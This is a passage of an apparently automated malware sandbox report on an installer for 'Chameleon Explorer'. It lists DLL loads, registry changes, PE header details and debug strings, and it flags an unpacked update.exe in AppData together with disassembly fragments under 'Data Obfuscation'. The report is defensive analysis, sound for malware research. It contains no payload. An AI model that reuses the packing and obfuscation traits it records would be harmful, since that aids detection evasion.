                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mswsock.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: rasadhlp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: amsi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mscms.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: coloradapterclient.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winshfhc.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wdscore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dwmapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: windowscodecs.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dataexchange.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: d3d11.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dcomp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dxgi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: twinapi.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: networkexplorer.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: secur32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: samcli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: samlib.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: netutils.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: drprov.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ntlanman.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: davclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: davhlpr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: dlnashext.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: playtodevice.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: devdispitemprovider.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mmdevapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: devobj.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wpdshext.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: portabledeviceapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: msasn1.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ehstorshell.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ehstorapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: thumbcache.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: policymanager.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: msvcp110_win.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mrmcorer.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: iertutil.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: edputil.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: urlmon.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: srvcli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wintypes.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: appresolver.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: bcp47langs.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: slc.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: sppc.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: textshaping.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winhttp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: winnsi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: olepro32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: taskschd.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: xmllite.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: olepro32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: olepro32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: taskschd.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: xmllite.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: olepro32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mpr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: shfolder.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wkscli.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}\InProcServer32Jump to behavior
                    Source: Chameleon Explorer.lnk.2.drLNK file: ..\..\..\..\..\..\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                    Source: Chameleon Explorer.lnk0.2.drLNK file: ..\..\..\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpWindow found: window name: TMainFormJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: ETVk1yP43q.exeStatic file information: File size 8302080 > 1048576
                    Source: ETVk1yP43q.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x720800
                    Source: ETVk1yP43q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: ETVk1yP43q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: ETVk1yP43q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: ETVk1yP43q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: ETVk1yP43q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: ETVk1yP43q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: ETVk1yP43q.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb\* source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\DLL\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdbJ source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C: (x8C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb\*V@E source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\dll\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\dll\ntdll.pdbX source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb\SYSTEM32\ntdll.pdbon Explorer\symbols\dll\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\DLL\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014CA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\SYSTEM32\ntdll.pdbT source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014D7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbdb( source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbP source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \SYSTEM32\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dows\SYSTEM32\ntdll.pdbT source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdbp source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb` source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\DLL\kernel32.pdbk source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb* source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\kernel32.pdb\*Y source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\SYSTEM32\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014D7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\DLL\kernel32.pdb1 source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014CA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: leonExplorerntdll.pdb\SYSTEM32\ntdll.pdbon Explorer\symbols\dll\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: ETVk1yP43q.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: ETVk1yP43q.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: ETVk1yP43q.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: ETVk1yP43q.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: ETVk1yP43q.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Roaming\update.exeUnpacked PE file: 21.2.update.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00417236 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,21_2_00417236
                    Source: is-SCGGO.tmp.2.drStatic PE information: section name: .didata
                    Source: is-F1F8N.tmp.2.drStatic PE information: section name: .didata
                    Source: is-JAVSO.tmp.2.drStatic PE information: section name: .didata
                    Source: is-32DE6.tmp.2.drStatic PE information: section name: .didata
                    Source: is-GJT7J.tmp.2.drStatic PE information: section name: .didata
                    Source: is-KSQ9G.tmp.2.drStatic PE information: section name: .didata
                    Source: is-KSQ9G.tmp.2.drStatic PE information: section name: JCLDEBUG
                    Source: is-29AV0.tmp.2.drStatic PE information: section name: .didata
                    Source: is-29AV0.tmp.2.drStatic PE information: section name: JCLDEBUG
                    Source: Folder.dll.9.drStatic PE information: section name: .didata
                    Source: Folder64.dll_backup.9.drStatic PE information: section name: .didata
                    Source: Folder64.dll.9.drStatic PE information: section name: .didata
                    Source: Folder.dll_backup.9.drStatic PE information: section name: .didata
                    Source: ExplorerHelper32.dll_backup.10.drStatic PE information: section name: .didata
                    Source: ExplorerHelper32.dll.10.drStatic PE information: section name: .didata
                    Source: ExplorerHelper64.dll.11.drStatic PE information: section name: .didata
                    Source: ExplorerHelper64.dll_backup.11.drStatic PE information: section name: .didata
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035F0434 push 035F04D1h; ret 2_2_035F04C9
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035A033C push ecx; mov dword ptr [esp], edx2_2_035A033D
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035A032C push ecx; mov dword ptr [esp], edx2_2_035A032D
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_0359F3E0 push ecx; mov dword ptr [esp], eax2_2_0359F3E2
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035D23E4 push ecx; mov dword ptr [esp], edx2_2_035D23E6
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_0359C3B0 push ecx; mov dword ptr [esp], edx2_2_0359C3B1
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035A23AC push ecx; mov dword ptr [esp], edx2_2_035A23AD
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_035DA2B0 push ecx; mov dword ptr [esp], edx2_2_035DA2B1
